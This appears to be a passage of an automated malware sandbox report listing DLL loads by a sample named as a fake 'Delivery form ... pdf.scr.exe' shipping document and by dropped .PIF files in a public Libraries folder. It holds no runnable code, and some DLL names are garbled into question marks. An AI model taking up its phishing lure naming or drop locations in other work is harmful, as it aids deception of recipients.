                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ???.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ???.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ???.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ??l.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ??l.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ?.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ?.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ??l.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ????.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ???e???????????.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ???e???????????.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ?.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ?.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ?.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ?.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ??l.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ??l.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: tquery.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: cryptdll.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: spp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: vssapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: vsstrace.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: spp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: vssapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: vsstrace.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: mssip32.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: advapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: advapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: advapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: advapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: advapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: advapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: advapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: spp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: vssapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: vsstrace.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppwmi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppcext.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: winscard.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: devobj.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                      Source: C:\Users\Public\Libraries\dxobknwL.pif Section loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: msimg32.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: version.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: url.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: ieframe.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: iertutil.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: netapi32.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: wkscli.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: netutils.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: winmm.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: wininet.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: sspicli.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: mswsock.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: iphlpapi.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: winnsi.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: ??????????.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: ??.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
